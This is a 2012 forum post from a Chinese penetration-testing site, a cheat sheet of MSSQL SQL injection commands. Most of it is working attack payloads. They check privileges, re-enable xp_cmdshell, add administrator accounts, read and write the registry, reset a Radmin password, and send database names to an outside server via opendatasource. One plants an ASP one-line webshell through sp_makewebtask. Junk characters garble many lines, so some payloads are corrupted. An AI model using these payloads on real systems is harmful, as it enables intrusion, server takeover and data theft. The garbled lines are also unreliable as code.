中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
2 b# w) U" o* Vand 1=(Select IS_MEMBER('db_owner'))
2 ?$ ]' Y0 L! k0 T. P$ jAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
- ~" l$ z5 e2 E2 }3 n2 v1 _
2 b7 v1 F6 g3 _! g# T//检测是否有读取某数据库的权限
5 V# k5 f0 [9 N0 C- f, iand 1= (Select HAS_DBACCESS('master'))
4 D. d' A% ]- {0 {" z* UAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --. q2 z3 R8 r" e1 j% r, O

7 K* ]7 C0 }7 C3 x& Q- c/ z( d, ~" T( W9 r; b8 {' b
数字类型4 J% c- D9 u" X$ D" y' x0 b; r+ y
and char(124)%2Buser%2Bchar(124)=0
: f% Q( d0 j" g- ^1 c
% [$ h' |' L- X) w4 Q字符类型7 A0 |- s3 P  d3 {, S, s0 L" n, [
' and char(124)%2Buser%2Bchar(124)=0 and ''='
: c2 O+ \% y" N3 T1 c" @% a1 I6 H
; q$ s, l0 q, Q" c' l6 D3 a搜索类型
$ U( D, I3 \5 k, D* f, y' {4 O' and char(124)%2Buser%2Bchar(124)=0 and '%'='4 \4 i" s3 k# ~1 M$ X9 M
6 l3 P2 M* h) x, T
爆用户名
2 c* Z8 X, H) q; N9 ~and user>04 k4 L0 t3 n) T
' and user>0 and ''='
8 }( C9 ?9 d  T. d
$ J( f' \4 m# ^检测是否为SA权限. w5 t6 {3 T  |8 p! a
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--1 ^. Z% h9 d( b; H0 |6 h
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
2 U6 K2 A: _' W6 [  J" M* a: `% _3 J' T
检测是不是MSSQL数据库+ p: I3 b9 i7 d2 b2 e
and exists (select * from sysobjects);--) N3 K- k0 O: n6 R1 f( q

* _2 H; n; R) H+ T2 O4 b检测是否支持多行
, w, ]# `& q) j' s" h/ e" \: n;declare @d int;--' I4 |- N  ~$ i1 P. \6 Y" `9 M8 X  i
" Y8 j. t1 o. I  q/ \( R
恢复 xp_cmdshell! ?/ f3 g9 M! x6 L
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--. T" t" ~' }, p7 K1 `0 ]* C) l; B

' L4 e/ _* x  J0 `9 o
: g5 ^& p7 f8 fselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')' y0 G+ X* S8 H6 i9 j5 W
( q; i! u* j$ ?, Y! x( `
//-----------------------' [0 U- N- u- Y9 P- r. Y: y
//       执行命令9 X2 k9 ~  o8 Y2 j2 y% B1 R
//-----------------------
2 i$ H# \6 X9 P5 o* u首先开启沙盘模式:4 b* _" [: m% Z# h
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, `9 p  ^* K( H3 s; w! Y4 S& d
4 B& @. [% f5 j- {
然后利用jet.oledb执行系统命令6 X5 M/ w' I" f, C
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 R' U8 }* Z, D
6 L, q2 A1 {  O; }  X4 S9 {
执行命令
/ E, h" b, G0 A# u# k9 X- [. ~- u( L;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--3 r, ^' W5 V. x$ q

& r; N+ f7 Y- @6 h* z5 eEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'2 q( _) i) ]8 m: j# y

8 H* e) E3 p; @判断xp_cmdshell扩展存储过程是否存在:
3 a" a+ m4 i1 u6 y; w3 }http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')- ^. W& V3 _  I( t/ j% K  A9 V
8 N3 G# _% g* S2 `8 F
写注册表
" }" x9 a5 W/ d# Zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 N0 |2 H! Z6 G3 D: R

. R$ f  W# }; j' l* rREG_SZ
6 i7 E7 f9 ^1 h$ }$ e( D
+ b( ~6 ?. \3 a0 M读注册表8 T% l  d: D% P
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit') U# S6 A& e4 t; Y/ b( u
  C  D9 S5 N+ \' O
读取目录内容: ~2 C/ l$ C1 E! Q% l0 W
exec master..xp_dirtree 'c:\winnt\system32\',1,1$ b; s5 k6 {- |  T9 r

% }) j2 s/ G) ^6 V% S1 t+ H# F) @6 F3 q" |* o! p1 {
数据库备份4 V% F% J7 I( X( e! a! Q1 o
backup database pubs to disk = 'c:\123.bak'
! t( \: O) u1 `% D" o/ B1 {3 c& ?1 y5 B
//爆出长度; i/ P. Z2 B# Q+ t- S
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
0 S0 X  c" M( O) S
0 V: Q& Y' Y" ~: W3 ]
7 b. O0 {  t" Y0 O0 o' `) ^4 B: v/ C+ s4 T5 T' W# n% e
更改sa口令方法:用sql综合利用工具连接后,执行命令:. o' W, _% f# M5 Q5 r
exec sp_password NULL,'新密码','sa'$ |( [. o8 o, ~% E) Y
9 a, ]/ K9 z" I, `' J# p
添加和删除一个SA权限的用户test:8 H2 o3 `( t/ p# w: [* {
exec master.dbo.sp_addlogin test,9530772
/ c" e, L5 F& u* E0 Q) f" [7 W) p" Gexec master.dbo.sp_addsrvrolemember test,sysadmin
4 H( T3 n3 ^5 H6 V
5 `+ J& ?' H$ L8 n' [( m删除扩展存储过过程xp_cmdshell的语句:3 x/ ~+ w& b$ v
exec sp_dropextendedproc 'xp_cmdshell'7 P5 o$ ~) c. o; g, F

2 J- H, H& n0 T8 Z7 l% @9 z添加扩展存储过过程
# L: B& ]/ u4 v9 q$ z1 bEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'# ]9 s$ B. b8 x! }$ E; w
GRANT exec On xp_proxiedadata TO public1 a3 ~1 l$ N$ v9 T% B; l3 O
! F/ s/ b, U8 k9 l

% q3 C* L. \: u停掉或激活某个服务。
8 ^: f1 U# w. h5 O
* D$ `8 ~) @! `6 X; Z# ~/ _exec master..xp_servicecontrol 'stop','schedule'
& p+ X) z& P; \" nexec master..xp_servicecontrol 'start','schedule'
& X2 D% R7 M# u  {. ?' L  A5 E, B4 p% \" Y( {7 t9 j
dbo.xp_subdirs4 G+ l  K: {/ U6 n; Q

% ~) n. b$ w. a& `- W* `( S* b( P) T只列某个目录下的子目录。
) j# b/ [; S% g$ g) a- |xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'4 n) c. H" A$ k! I* Z. R
8 ?3 y+ d& r2 A9 Z
dbo.xp_makecab
0 }3 J5 S* _4 v' q8 Z6 c4 J) y. b- H( R7 G) [5 k# V
将目标多个档案压缩到某个目标档案之内。
! O7 @- H9 ~( j所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。% O; k; _+ r- q! p* S0 ~
9 w: D  b$ `% [! {: q- G( y  a
dbo.xp_makecab" `0 D" g4 L+ \3 u% ]) G
'c:\test.cab','mszip',1,- w# A1 n6 J3 }& ?  K# G
'C:\Inetpub\wwwroot\SQLInject\login.asp',! V* G& W& m8 d) g+ @  Q$ S! q( T8 c
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 c8 s' ?) c! j! S
6 Z$ t; i0 D* @8 Q: h3 X3 B; k- z) ?xp_terminate_process
: |8 F' y5 [( Z2 o0 ^0 ?0 ]& k& `: w+ ?
停掉某个执行中的程序,但赋予的参数是 Process ID。
- k# ], ]! L" @& o8 e* {利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
, C8 _5 j" _* Q7 o4 W$ q  [& C/ ]: p5 L/ k, j) t8 v$ q4 N4 v. \
xp_terminate_process 2484  g( J  m3 o6 g. [0 [: r8 {& Q; h
& }  |3 |: f1 p: Y+ |0 Q2 |
xp_unpackcab
; M# w0 E( m7 k7 I1 L2 z
, u6 F" l; ^( p, C  E: W8 n解开压缩档。1 X( x" u4 c5 ^& Y# Z! Y' `

3 W% [' m3 G: uxp_unpackcab 'c:\test.cab','c:\temp',1
/ ^* M+ f7 ]+ ?3 R' t7 n6 ?" a/ y& S' Z& a* S; H
$ t  g& K/ |( e$ s( W
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12341 {( K/ g4 V: A0 _' k  e  g

" M: |( z( O; i- T; I4 s3 Fcreate database lcx;
  W) p1 b  _/ H; X& DCreate TABLE ku(name nvarchar(256) null);9 k% R! U% h3 T, B
Create TABLE biao(id int NULL,name nvarchar(256) null);& w( _( m7 _8 F) b" [

) j4 }) |+ W  A6 }0 G1 X0 |//得到数据库名
4 j* ?, n: P5 \3 E' zinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases" W  J9 m3 ~! A' Q$ ?* J0 k

: n7 ]* t% y- i& T4 B' p# M* z# {- i( u
//在Master中创建表,看看权限怎样9 r# o0 Y. o5 I; m
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--3 ^+ c$ t9 {7 Q8 C6 H% g
% d, F) R6 ?! v( e1 w
用 sp_makewebtask直接在web目录里写入一句话马:8 c/ C# S) j3 o/ B; }* U0 n
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
1 j' t7 i$ [. r, M( g8 x3 X* n' k& ]
//更新表内容( [# T$ h( ~9 |
Update films SET kind = 'Dramatic' Where id = 1230 o. U3 c$ T* ?. p

7 l$ Z4 q; M: _2 `* V5 b//删除内容/ u+ o' j3 [. D5 i5 H; k
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2